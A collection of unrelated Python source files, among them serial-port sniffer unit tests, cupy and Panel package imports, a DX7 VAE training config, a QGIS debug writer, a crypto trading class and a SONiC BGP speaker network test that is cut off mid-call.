with patch("granola.serial_sniffer.datetime") as dt:
dt.now.return_value = datetime(2021, 9, 17, 16, 46, 7)
sniff_sniff = SerialSniffer()
true_outpath = "2021-09-17T16-46-07_serial_commands.csv"
# It creates an output file at ./[timestamp]_serial_commands.csv
assert sniff_sniff.outpath == os.path.abspath(true_outpath)
# and we cleanup the created sniffer file
os.remove(sniff_sniff.outpath)
def test_sniffer_given_port_only_uses_that_path():
# Given some comport
com = "COM3"
# When you create a sniffer object
with patch("serial.Serial.open"), patch("granola.serial_sniffer.datetime") as dt:
dt.now.return_value = datetime(2021, 9, 17, 16, 46, 7)
sniff_sniff = SerialSniffer(com, baudrate=9600)
# It creates a custom filename of the form [timestamp]_[port].csv
true_outpath = "2021-09-17T16-46-07_COM3.csv"
assert sniff_sniff.outpath == os.path.abspath(true_outpath)
# and we cleanup the created sniffer file
os.remove(sniff_sniff.outpath)
def test_sniffer_with_absolute_path_uses_that_path():
# Given a sniffer object with an absolute path
class AbsoluteSniffer(SerialSniffer):
outfile = os.path.abspath("some_output.csv")
# When you initialize an object with or without an associated com port
rel_sniff_no_com = AbsoluteSniffer()
with patch("serial.Serial.open"):
rel_sniff_com = AbsoluteSniffer("COM3")
# Then the output file is opened in the right directory
try:
assert os.path.exists(os.path.abspath("some_output.csv"))
finally:
# and we cleanup the created sniffer file
os.remove(rel_sniff_no_com.outpath)
# Then the sniffer given a comport had that same outpath, and was also cleaned up
assert not os.path.exists(rel_sniff_com.outpath)
def test_sniffer_with_relative_path_uses_that_path():
# Given a sniffer object with a relative path
path = "granola/tests/some_output.csv"
class AbsoluteSniffer(SerialSniffer):
outfile = path
# When you initialize an object
abs_sniff_no_com = AbsoluteSniffer()
with patch("serial.Serial.open"):
abs_sniff_com = AbsoluteSniffer("COM3")
# Then the output file is opened in the right directory
try:
assert os.path.exists(os.path.abspath("granola/tests/some_output.csv"))
finally:
# and we cleanup the created sniffer file
os.remove(abs_sniff_no_com.outpath)
# Then the sniffer given a comport had that same outpath, and was also cleaned up
assert not os.path.exists(abs_sniff_com.outpath)
def test_read_write_are_recorded_and_only_produce_one_row(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
# When we write a command and read the response
mock_write.return_value = len(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
# Then the result is written to the csv
result = load_serial_df(sniff_sniff.outpath)
with open(sniff_sniff.outpath) as sniffer_out_file:
assert len(sniffer_out_file.readlines()) == 2
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_two_sequential_writes_and_one_read_generates_only_one_row(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
# When we read and then write
mock_write.return_value = len(input)
sniff_sniff.write(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
# Then the result is written to the csv, and there are not extra rows
result = load_serial_df(sniff_sniff.outpath)
assert len(result) == 1
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_one_write_and_two_sequential_reads_ignores_unmatched_outputs(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
# When we write and then read twice
mock_write.return_value = len(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
sniff_sniff.read()
# Then the result is written to the csv, and there are not extra rows
result = load_serial_df(sniff_sniff.outpath)
assert len(result) == 1
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_read_write_in_pieces_produces_only_one_row(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
# When we write a command character by character and then read the response character by character
for int_ in bytes(input):
mock_write.return_value = 1
sniff_sniff.write(int_to_char(int_))
for int_ in output:
mock_read.return_value = int_to_char(int_)
sniff_sniff.read()
# Then the result is written to the csv, and nothing else
result = load_serial_df(sniff_sniff.outpath)
assert len(result) == 1
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_non_ascii_bytes_write_to_csv(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command with non-ascii encoded outputs
input = b"scan\r"
output = b"\r\x92 yv c.dxu0~q }k0\x80qf|\x7f f.by~w0q 0lu||\x94\x7fu c.dxu0~q }k0\x80qf|\x7f f 0|y~w0 q.ru||\r>"
mock_write.return_value = len(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
# Then the result is written to the csv
result = load_serial_df(sniff_sniff.outpath)
with open(sniff_sniff.outpath) as sniffer_out_file:
assert len(sniffer_out_file.readlines()) == 2
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_clear_input_buffer(mock_write, sniff_sniff):
# Given a serial sniffer and some input
input = b"some garbage"
# When you write the input and then call flush input in the appropriate version of pyserial
mock_write.return_value = len(input)
sniff_sniff.write(input)
if check_min_package_version("pyserial", "3.0"):
with patch("serial.Serial.reset_input_buffer"):
sniff_sniff.reset_input_buffer() # defined for pyserial versions >= 3.0
else:
with patch("serial.Serial.flushInput"):
sniff_sniff.flushInput() # defined for pyserial versions < 3.0
# Then the current write buffer will be empty
assert sniff_sniff.current_read == b""
def test_clear_output_buffer(mock_read, sniff_sniff):
# Given a serial sniffer and some input
output = b"some garbage"
# When you read some output and then call flush output in the appropriate version of pyserial
mock_read.return_value = output
sniff_sniff.read(output)
if check_min_package_version("pyserial", "3.0"):
with patch("serial.Serial.reset_output_buffer"):
sniff_sniff.reset_output_buffer() # defined for pyserial versions >= 3.0
else:
with patch("serial.Serial.flushOutput"):
sniff_sniff.flushOutput() # defined for pyserial versions < 3.0
# Then the current read buffer will be empty
assert sniff_sniff.current_write == b""
def test_delay_recorded(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output and a delay
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
delay = 1
# When we write a command and read the response
mock_write.return_value = len(input)
sniff_sniff.write(input)
time.sleep(delay)
mock_read.return_value = output
sniff_sniff.read()
# Then the result is written to the csv
result = load_serial_df(sniff_sniff.outpath)
assert result.loc[0, "delay(ms)"] >= delay * 1000
def test_reads_writes_length_of_terminator_still_behave(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"\r"
output = b"\r>"
# When we read/write just the terminator
mock_write.return_value = len(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
# Then no errors are thrown and the lines are still written
result = load_serial_df(sniff_sniff.outpath)
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
|
py | b40b34c378121ad8190d704c6765215490dc7f58 | from cupy.core import core # NOQA
from cupy.core import internal # NOQA
# import class and function
from cupy.core.core import absolute # NOQA
from cupy.core.core import add # NOQA
from cupy.core.core import angle # NOQA
from cupy.core.core import array # NOQA
from cupy.core.core import array_split # NOQA
from cupy.core.core import ascontiguousarray # NOQA
from cupy.core.core import asfortranarray # NOQA
from cupy.core.core import bitwise_and # NOQA
from cupy.core.core import bitwise_or # NOQA
from cupy.core.core import bitwise_xor # NOQA
from cupy.core.core import broadcast # NOQA
from cupy.core.core import broadcast_to # NOQA
from cupy.core.core import concatenate_method # NOQA
from cupy.core.core import conj # NOQA
from cupy.core.core import create_comparison # NOQA
from cupy.core.core import create_reduction_func # NOQA
from cupy.core.core import create_ufunc # NOQA
from cupy.core.core import divide # NOQA
from cupy.core.core import divmod # NOQA
from cupy.core.core import dot # NOQA
from cupy.core.core import elementwise_copy # NOQA
from cupy.core.core import elementwise_copy_where # NOQA
from cupy.core.core import ElementwiseKernel # NOQA
from cupy.core.core import equal # NOQA
from cupy.core.core import floor_divide # NOQA
from cupy.core.core import greater # NOQA
from cupy.core.core import greater_equal # NOQA
from cupy.core.core import imag # NOQA
from cupy.core.core import invert # NOQA
from cupy.core.core import left_shift # NOQA
from cupy.core.core import less # NOQA
from cupy.core.core import less_equal # NOQA
from cupy.core.core import matmul # NOQA
from cupy.core.core import moveaxis # NOQA
from cupy.core.core import multiply # NOQA
from cupy.core.core import nanmax # NOQA
from cupy.core.core import nanmin # NOQA
from cupy.core.core import ndarray # NOQA
from cupy.core.core import negative # NOQA
from cupy.core.core import normalize_axis_tuple # NOQA
from cupy.core.core import not_equal # NOQA
from cupy.core.core import power # NOQA
from cupy.core.core import real # NOQA
from cupy.core.core import ReductionKernel # NOQA
from cupy.core.core import remainder # NOQA
from cupy.core.core import right_shift # NOQA
from cupy.core.core import rollaxis # NOQA
from cupy.core.core import size # NOQA'
from cupy.core.core import sqrt # NOQA
from cupy.core.core import subtract # NOQA
from cupy.core.core import tensordot_core # NOQA
from cupy.core.core import true_divide # NOQA
from cupy.core.core import ufunc # NOQA
from cupy.core.internal import complete_slice # NOQA
from cupy.core.internal import get_size # NOQA
|
py | b40b359bdfe50d2481e32755accc9d7a612e99fb | """
Panel is a high level app and dashboarding framework
====================================================
Panel is an open-source Python library that lets you create custom
interactive web apps and dashboards by connecting user-defined widgets
to plots, images, tables, or text.
Panel works with the tools you know and ❤️.
Check out https://panel.holoviz.org/
.. figure:: https://user-images.githubusercontent.com/42288570/152672367-6c239073-0ea0-4a2b-a4c0-817e8090e877.gif
:alt: Panel Dashboard
Panel Dashboard
How to develop a Panel app in 3 simple steps
--------------------------------------------
- Write the app
>>> import panel as pn
>>> pn.extension(sizing_mode="stretch_width", template="fast")
>>> pn.state.template.param.update(title="My Data App")
>>> pn.panel(some_python_object).servable()
- Run your app
$ panel serve my_script.py --autoreload --show
or
$ panel serve my_notebook.ipynb --autoreload --show
The app will be available in your browser!
- Change your code and save it
The app will reload with your changes!
You can also add automatic reload to jupyterlab. Check out
https://blog.holoviz.org/panel_0.12.0.html#JupyterLab-previews
To learn more about Panel check out
https://panel.holoviz.org/getting_started/index.html
"""
from . import layout # noqa
from . import links # noqa
from . import pane # noqa
from . import param # noqa
from . import pipeline # noqa
from . import reactive # noqa
from . import viewable # noqa
from . import widgets # noqa
from .config import config, panel_extension as extension, __version__ # noqa
from .depends import bind, depends # noqa
from .interact import interact # noqa
from .io import _jupyter_server_extension_paths, ipywidget, serve, state # noqa
from .layout import ( # noqa
Accordion, Card, Column, GridSpec, GridBox, FlexBox, Tabs, Row,
Spacer, WidgetBox
)
from .pane import panel, Pane # noqa
from .param import Param # noqa
from .template import Template # noqa
from .widgets import indicators # noqa
__all__ = (
"__version__",
"Accordion",
"Card",
"Column",
"FlexBox",
"GridBox",
"GridSpec",
"Pane", # deprecated
"Param",
"Row",
"Spacer",
"Tabs",
"Template",
"WidgetBox",
"bind",
"config",
"depends",
"extension",
"indicators",
"interact",
"ipywidget",
"layout",
"links",
"pane",
"panel",
"param",
"pipeline",
"reactive",
"serve",
"state",
"viewable",
"widgets",
)
|
py | b40b35ffa139c36d9610fe529d42b490755c43dc | #%%
from os import environ
environ['MLFLOW_TRACKING_URI'] = 'http://tracking.olympus.nintorac.dev:9001/'
from neuralDX7.constants import N_PARAMS, MAX_VALUE
from agoge.utils import trial_name_creator
from neuralDX7 import DEFAULTS
from agoge import TrainWorker as Worker
from ray import tune
from neuralDX7.models import DX7VAE as Model
from neuralDX7.solvers import DX7VAE as Solver
from neuralDX7.datasets import DX7SysexDataset as Dataset
def config(experiment_name, trial_name,
n_heads=8, n_features=64,
batch_size=16, data_size=1.,
latent_dim=8, num_flows=16,
**kwargs):
data_handler = {
'Dataset': Dataset,
'dataset_opts': {
'data_size': data_size
},
'loader_opts': {
'batch_size': batch_size,
},
}
### MODEL FEATURES
layer_features = n_heads * n_features
head_features = layer_features // n_heads
attention = {
'n_features': layer_features,
'n_hidden': head_features,
'n_heads': n_heads
}
attention_layer = {
'attention': attention,
'features': layer_features,
'hidden_dim': layer_features * 3
}
encoder = {
'features': layer_features,
'attention_layer': attention_layer,
'max_len': N_PARAMS,
'n_layers': 12
}
model = {
'Model': Model,
'features': layer_features,
'latent_dim': latent_dim,
'encoder': encoder,
'decoder': {
'c_features': latent_dim,
'features': layer_features,
'attention_layer': attention_layer,
'max_len': N_PARAMS,
'n_layers': 12
},
'num_flows': num_flows,
'deterministic_path_drop_rate': 0.8
}
solver = {
'Solver': Solver,
'beta_temp': 6e-5,
'max_beta': 0.5
}
tracker = {
'metrics': [
'reconstruction_loss',
'accuracy',
'kl',
'beta',
'log_det',
'q_z_0',
'p_z_k',
],
'experiment_name': experiment_name,
'trial_name': trial_name
}
return {
'data_handler': data_handler,
'model': model,
'solver': solver,
'tracker': tracker,
}
if __name__=='__main__':
# from ray import ray
import sys
postfix = sys.argv[1] if len(sys.argv)==2 else ''
# ray.init()
# from ray.tune.utils import validate_save_restore
# validate_save_restore(Worker)
# client = MlflowClient(tracking_uri='localhost:5000')
experiment_name = f'dx7-vae-dev'#+experiment_name_creator()
# experiment_id = client.create_experiment(experiment_name)
experiment_metrics = dict(metric="loss/accuracy", mode="max")
tune.run(Worker,
config={
'config_generator': config,
'experiment_name': experiment_name,
'points_per_epoch': 10
},
trial_name_creator=trial_name_creator,
resources_per_trial={
# 'gpu': 1
# 'cpu': 5
},
checkpoint_freq=2,
checkpoint_at_end=True,
keep_checkpoints_num=1,
# search_alg=bohb_search,
# scheduler=bohb_hyperband,
num_samples=1,
verbose=0,
local_dir=DEFAULTS['ARTIFACTS_ROOT']
# webui_host='127.0.0.1' ## supresses an error
# stop={'loss/loss': 0}
)
# points_per_epoch
# %%
|
py | b40b37d7f3a1289b7643ed0304e2da879605d293 | import os
from qgis.core import QgsFeature, QgsField, QgsFields
from qgis.PyQt.QtCore import QVariant
from catatom2osm.geo.geometry import Geometry
from catatom2osm.geo.layer.base import BaseLayer
from catatom2osm.geo.types import WKBPoint
class DebugWriter:
"""A QgsVectorFileWriter for debugging purposess."""
def __init__(
self, filename, layer, driver_name="ESRI Shapefile", geom_type=WKBPoint
):
"""
Construct.
Args:
filename (str): File name of this layer
layer (QgsVectorLayer): A layer to test.
driver_name (str): Defaults to ESRI Shapefile.
"""
fpath = os.path.join(
os.path.dirname(layer.dataProvider().dataSourceUri()), filename
)
fields = QgsFields()
fields.append(QgsField("note", QVariant.String, len=100))
writer = BaseLayer.get_writer(fpath, layer.crs(), fields, geom_type)
self.fields = fields
self.writer = writer
def add_point(self, point, note=None):
"""Add a point to the layer with the attribute note."""
feat = QgsFeature(QgsFields(self.fields))
geom = Geometry.fromPointXY(point)
feat.setGeometry(geom)
if note:
feat.setAttribute("note", note[:254])
return self.addFeature(feat)
def addFeature(self, *args, **kwargs):
self.writer.addFeature(*args, **kwargs)
|
py | b40b38501f5f6040f163a52ff0e5a258c856969f | import math
from decimal import Decimal
from os import environ
from typing import Optional, List, Dict, Type
from sqlalchemy.orm import Session
from lib.account.account import Account
from lib.asset.asset_manager import AssetManager
from lib.exchange.exchange import Exchange
from lib.order.order_meta import OrderMeta
from lib.order.order import Order
from lib.order.order_repository import OrderRepository
from lib.order.order_type import OrderType
from lib.strategy.aroon import Aroon
from lib.strategy.base_strategy import BaseStrategy
import lib.logger as logger
from lib.strategy.cci import Cci
from lib.strategy.dc_breakout import DcBreakout
from lib.strategy.rsi_bb import RsiBb
from lib.strategy.stoch_rsi import StochRsi
def get_trading_tickers() -> List[str]:
"""get tickers open for trade"""
return ["BTC", "ETH"]
def get_trading_strategies_by_ticker(tickers: List[str], override_strategy: Optional[Type[BaseStrategy]] = None) -> Dict[str, List[Type[BaseStrategy]]]:
default_strategies = [DcBreakout, Aroon, Cci, RsiBb, StochRsi]
strategies = [override_strategy] if override_strategy is not None else default_strategies
return { ticker: strategies for ticker in tickers }
class Trader:
asset_manager: AssetManager
exchange: Exchange
sess: Session
account: Account
order_repository: OrderRepository
account_risk_ratio = Decimal("0.01")
stoploss_ratio = Decimal("0.1")
def __init__(self,
asset_manager: AssetManager,
exchange: Exchange,
sess: Session,
account: Account,
order_repository: OrderRepository):
self.asset_manager = asset_manager
self.exchange = exchange
self.sess = sess
self.account = account
self.order_repository = order_repository
def trade(self, ticker: str, strategy: BaseStrategy, position_size: Optional[str] = None) -> Optional[Order]:
amount = Decimal(position_size) if position_size else self.get_position_size()
last_order = self.order_repository.get_last_order(
ticker=ticker,
strategy=strategy.get_name(),
account_id=self.account.get_id()
)
should_buy = (not last_order or (last_order.get_order_type() == OrderType.SELL and last_order.is_filled())) and strategy.should_buy() and amount > Decimal("0")
should_sell = last_order and last_order.is_filled() and last_order.get_order_type() == OrderType.BUY and strategy.should_sell()
logger.info(f"last order = {last_order}, should buy = {should_buy}, should sell = {should_sell}")
order = None
if should_buy:
order = self.exchange.buy(ticker=ticker, amount=amount)
if should_sell:
order = self.exchange.sell(ticker=ticker, volume=last_order.get_volume())
if order:
meta = OrderMeta.parse_obj(
dict(
strategy=strategy.get_name(),
account_id=self.account.get_id()
)
)
logger.info(f"order placed, order = {order}, meta = {meta}")
self.on_trade_success(order, meta)
return order
def get_position_size(self) -> Decimal:
cash = self.asset_manager.get_cash()
position_size = Decimal(math.floor(((self.asset_manager.get_account_size() * self.account_risk_ratio) / self.stoploss_ratio)))
return position_size if cash >= position_size else Decimal("0")
def on_trade_success(self, order: Order, meta: OrderMeta) -> None:
self.order_repository.add_order(order, meta)
|
py | b40b38c97634aee2fc38b9559674a70d366b1327 | import pytest
from netaddr import *
import time
import logging
import requests
import ipaddress
import json
from tests.common import constants
from tests.common.fixtures.ptfhost_utils import copy_ptftests_directory # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import set_ptf_port_mapping_mode # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import change_mac_addresses # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import remove_ip_addresses # lgtm[py/unused-import]
from tests.ptf_runner import ptf_runner
from tests.common.utilities import wait_tcp_connection
from tests.common.helpers.assertions import pytest_require
from tests.common.utilities import wait_until
pytestmark = [
pytest.mark.topology('t0'),
pytest.mark.device_type('vs')
]
logger = logging.getLogger(__name__)
PTF_TEST_PORT_MAP = '/root/ptf_test_port_map.json'
def generate_ips(num, prefix, exclude_ips):
"""
Generate random ips within prefix
"""
prefix = IPNetwork(prefix)
exclude_ips.append(prefix.broadcast)
exclude_ips.append(prefix.network)
generated_ips = []
for available_ip in prefix:
if available_ip not in exclude_ips:
generated_ips.append(IPNetwork(str(available_ip) + '/' + str(prefix.prefixlen)))
if len(generated_ips) == num:
break
else:
raise Exception("Not enough available IPs")
return generated_ips
def announce_route(ptfip, neighbor, route, nexthop, port):
change_route("announce", ptfip, neighbor, route, nexthop, port)
def withdraw_route(ptfip, neighbor, route, nexthop, port):
change_route("withdraw", ptfip, neighbor, route, nexthop, port)
def change_route(operation, ptfip, neighbor, route, nexthop, port):
url = "http://%s:%d" % (ptfip, port)
data = {"command": "neighbor %s %s route %s next-hop %s" % (neighbor, operation, route, nexthop)}
r = requests.post(url, data=data)
assert r.status_code == 200
@pytest.fixture(scope="module", autouse=True)
def skip_dualtor(tbinfo):
"""Skip running `test_bgp_speaker` over dualtor."""
pytest_require("dualtor" not in tbinfo["topo"]["name"], "Skip 'test_bgp_speaker over dualtor.'")
@pytest.fixture(scope="module")
def common_setup_teardown(duthosts, rand_one_dut_hostname, ptfhost, localhost, tbinfo):
logger.info("########### Setup for bgp speaker testing ###########")
duthost = duthosts[rand_one_dut_hostname]
ptfip = ptfhost.mgmt_ip
logger.info("ptfip=%s" % ptfip)
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
interface_facts = duthost.interface_facts()['ansible_facts']
constants_stat = duthost.stat(path="/etc/sonic/constants.yml")
if constants_stat["stat"]["exists"]:
res = duthost.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
else:
res = duthost.shell("sonic-cfggen -m -d -y /etc/sonic/deployment_id_asn_map.yml -v \"deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
vlan_ips = generate_ips(3, "%s/%s" % (mg_facts['minigraph_vlan_interfaces'][0]['addr'],
mg_facts['minigraph_vlan_interfaces'][0]['prefixlen']),
[IPAddress(mg_facts['minigraph_vlan_interfaces'][0]['addr'])])
logger.info("Generated vlan_ips: %s" % str(vlan_ips))
speaker_ips = generate_ips(2, mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0], [])
speaker_ips.append(vlan_ips[0])
logger.info("speaker_ips: %s" % str(speaker_ips))
port_num = [7000, 8000, 9000]
lo_addr = mg_facts['minigraph_lo_interfaces'][0]['addr']
lo_addr_prefixlen = int(mg_facts['minigraph_lo_interfaces'][0]['prefixlen'])
vlan_addr = mg_facts['minigraph_vlan_interfaces'][0]['addr']
vlan_ports = []
for i in range(0, 3):
vlan_ports.append(mg_facts['minigraph_ptf_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][i]])
if "backend" in tbinfo["topo"]["name"]:
vlan_id = mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['vlanid']
ptf_ports = [("eth%s" % _) + constants.VLAN_SUB_INTERFACE_SEPARATOR + vlan_id for _ in vlan_ports]
else:
ptf_ports = ["eth%s" % _ for _ in vlan_ports]
logger.info("vlan_ports: %s" % str(vlan_ports))
logger.info("ptf_ports: %s", ptf_ports)
# Generate ipv6 nexthops
vlan_ipv6_entry = mg_facts['minigraph_vlan_interfaces'][1]
vlan_ipv6_prefix = "%s/%s" % (vlan_ipv6_entry["addr"], vlan_ipv6_entry["prefixlen"])
vlan_ipv6_address = vlan_ipv6_entry["addr"]
vlan_if_name = vlan_ipv6_entry['attachto']
nexthops_ipv6 = generate_ips(3, vlan_ipv6_prefix, [IPAddress(vlan_ipv6_address)])
logger.info("Generated nexthops_ipv6: %s" % str(nexthops_ipv6))
logger.info("setup ip/routes in ptf")
for i in [0, 1, 2]:
ptfhost.shell("ip -6 addr add %s dev %s:%d" % (nexthops_ipv6[i], ptf_ports[0], i))
# Issue a ping command to populate entry for next_hop
for nh in nexthops_ipv6:
duthost.shell("ping6 %s -c 3" % nh.ip)
logger.info("setup ip/routes in ptf")
ptfhost.shell("ifconfig %s %s" % (ptf_ports[0], vlan_ips[0]))
ptfhost.shell("ifconfig %s:0 %s" % (ptf_ports[0], speaker_ips[0]))
ptfhost.shell("ifconfig %s:1 %s" % (ptf_ports[0], speaker_ips[1]))
ptfhost.shell("ifconfig %s %s" % (ptf_ports[1], vlan_ips[1]))
ptfhost.shell("ifconfig %s %s" % (ptf_ports[2], vlan_ips[2]))
ptfhost.shell("ip route flush %s/%d" % (lo_addr, lo_addr_prefixlen))
ptfhost.shell("ip route add %s/%d via %s" % (lo_addr, lo_addr_prefixlen, vlan_addr))
logger.info("clear ARP cache on DUT")
duthost.command("sonic-clear arp")
for ip in vlan_ips:
duthost.command("ip route flush %s/32" % ip.ip)
# The ping here is workaround for known issue:
# https://github.com/Azure/SONiC/issues/387 Pre-ARP support for static route config
# When there is no arp entry for next hop, routes learnt from exabgp will not be set down to ASIC
# Also because of issue https://github.com/Azure/sonic-buildimage/issues/5185 ping is done before route addition.
duthost.shell("ping %s -c 3" % ip.ip)
time.sleep(2)
duthost.command("ip route add %s/32 dev %s" % (ip.ip, mg_facts['minigraph_vlan_interfaces'][0]['attachto']))
logger.info("Start exabgp on ptf")
for i in range(0, 3):
local_ip = str(speaker_ips[i].ip)
ptfhost.exabgp(name="bgps%d" % i,
state="started",
local_ip=local_ip,
router_id=local_ip,
peer_ip=lo_addr,
local_asn=bgp_speaker_asn,
peer_asn=mg_facts['minigraph_bgp_asn'],
port=str(port_num[i]))
# check exabgp http_api port is ready
http_ready = True
for i in range(0, 3):
http_ready = wait_tcp_connection(localhost, ptfip, port_num[i])
if not http_ready:
break
logger.info("########### Done setup for bgp speaker testing ###########")
yield ptfip, mg_facts, interface_facts, vlan_ips, nexthops_ipv6, vlan_if_name, speaker_ips, port_num, http_ready
logger.info("########### Teardown for bgp speaker testing ###########")
for i in range(0, 3):
ptfhost.exabgp(name="bgps%d" % i, state="absent")
logger.info("exabgp stopped")
for ip in vlan_ips:
duthost.command("ip route flush %s/32" % ip.ip, module_ignore_errors=True)
duthost.command("sonic-clear arp")
duthost.command("sonic-clear fdb all")
duthost.command("ip -6 neigh flush all")
logger.info("########### Done teardown for bgp speaker testing ###########")
def test_bgp_speaker_bgp_sessions(common_setup_teardown, duthosts, rand_one_dut_hostname):
"""Setup bgp speaker on T0 topology and verify bgp sessions are established
"""
duthost = duthosts[rand_one_dut_hostname]
ptfip, mg_facts, interface_facts, vlan_ips, _, _, speaker_ips, port_num, http_ready = common_setup_teardown
assert http_ready
logger.info("Wait some time to verify that bgp sessions are established")
time.sleep(20)
bgp_facts = duthost.bgp_facts()['ansible_facts']
assert all([v["state"] == "established" for _, v in bgp_facts["bgp_neighbors"].items()]), \
"Not all bgp sessions are established"
assert str(speaker_ips[2].ip) in bgp_facts["bgp_neighbors"], "No bgp session with PTF"
# For dualtor
@pytest.fixture(scope='module')
def vlan_mac(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
config_facts = duthost.config_facts(host=duthost.hostname, source='running')['ansible_facts']
dut_vlan_mac = None
for vlan in config_facts.get('VLAN', {}).values():
if 'mac' in vlan:
logger.debug('Found VLAN mac')
dut_vlan_mac = vlan['mac']
break
if not dut_vlan_mac:
logger.debug('No VLAN mac, use default router_mac')
dut_vlan_mac = duthost.facts['router_mac']
return dut_vlan_mac
# For dualtor
def get_dut_enabled_ptf_ports(tbinfo, hostname):
dut_index = str(tbinfo['duts_map'][hostname])
ptf_ports = set(tbinfo['topo']['ptf_map'][dut_index].values())
disabled_ports = set()
if dut_index in tbinfo['topo']['ptf_map_disabled']:
disabled_ports = set(tbinfo['topo']['ptf_map_disabled'][dut_index].values())
return ptf_ports - disabled_ports
# For dualtor
def get_dut_vlan_ptf_ports(mg_facts):
ports = set()
for vlan in mg_facts['minigraph_vlans']:
for member in mg_facts['minigraph_vlans'][vlan]['members']:
ports.add(mg_facts['minigraph_port_indices'][member])
return ports
def is_all_neighbors_learned(duthost, speaker_ips):
bgp_facts = duthost.bgp_facts()['ansible_facts']
for ip in speaker_ips:
if not str(ip.ip) in bgp_facts['bgp_neighbors']:
return False
if not bgp_facts['bgp_neighbors'][str(ip.ip)]['accepted prefixes'] == 1:
return False
return True
def bgp_speaker_announce_routes_common(common_setup_teardown,
tbinfo, duthost, ptfhost, ipv4, ipv6, mtu,
family, prefix, nexthop_ips, vlan_mac):
"""Setup bgp speaker on T0 topology and verify routes advertised by bgp speaker is received by T0 TOR
"""
ptfip, mg_facts, interface_facts, vlan_ips, _, vlan_if_name, speaker_ips, port_num, http_ready = common_setup_teardown
assert http_ready
logger.info("announce route")
peer_range = mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0]
lo_addr = mg_facts['minigraph_lo_interfaces'][0]['addr']
logger.info("Announce ip%s prefixes over ipv4 bgp sessions" % family)
announce_route(ptfip, lo_addr, prefix, nexthop_ips[1].ip, port_num[0])
announce_route(ptfip, lo_addr, prefix, nexthop_ips[2].ip, port_num[1])
announce_route(ptfip, lo_addr, peer_range, vlan_ips[0].ip, port_num[2])
logger.info("Wait some time to make sure routes announced to dynamic bgp neighbors")
assert wait_until(90, 10, 0, is_all_neighbors_learned, duthost, speaker_ips), "Not all dynamic neighbors were learned"
logger.info("Verify nexthops and nexthop interfaces for accepted prefixes of the dynamic neighbors")
rtinfo = duthost.get_ip_route_info(ipaddress.ip_network(unicode(prefix)))
nexthops_ip_set = { str(nexthop.ip) for nexthop in nexthop_ips }
assert len(rtinfo["nexthops"]) == 2
for i in [0,1]:
assert str(rtinfo["nexthops"][i][0]) in nexthops_ip_set
assert rtinfo["nexthops"][i][1] == unicode(vlan_if_name)
logger.info("Generate route-port map information")
extra_vars = {'announce_prefix': prefix,
'is_backend': 'backend' in tbinfo['topo']['name'],
'minigraph_portchannels': mg_facts['minigraph_portchannels'],
'minigraph_vlans': mg_facts['minigraph_vlans'],
'minigraph_port_indices': mg_facts['minigraph_ptf_indices']}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
logger.info("extra_vars: %s" % str(ptfhost.host.options['variable_manager'].extra_vars))
ptfhost.template(src="bgp/templates/bgp_speaker_route.j2", dest="/root/bgp_speaker_route_%s.txt" % family)
# For fib PTF testing, including dualtor
ptf_test_port_map = {}
enabled_ptf_ports = get_dut_enabled_ptf_ports(tbinfo, duthost.hostname)
vlan_ptf_ports = get_dut_vlan_ptf_ports(mg_facts)
logger.debug('enabled_ptf_ports={}, vlan_ptf_ports={}, vlan_mac={}'\
.format(enabled_ptf_ports, vlan_ptf_ports, vlan_mac))
for port in enabled_ptf_ports:
if port in vlan_ptf_ports:
target_mac = vlan_mac
else:
target_mac = duthost.facts['router_mac']
ptf_test_port_map[str(port)] = {
'target_dut': 0,
'target_mac': target_mac
}
ptfhost.copy(content=json.dumps(ptf_test_port_map), dest=PTF_TEST_PORT_MAP)
logger.info("run ptf test")
ptf_runner(ptfhost,
"ptftests",
"fib_test.FibTest",
platform_dir="ptftests",
params={"router_macs": [duthost.facts['router_mac']],
"ptf_test_port_map": PTF_TEST_PORT_MAP,
"fib_info_files": ["/root/bgp_speaker_route_%s.txt" % family],
"ipv4": ipv4,
"ipv6": ipv6,
"testbed_mtu": mtu,
"test_balancing": False},
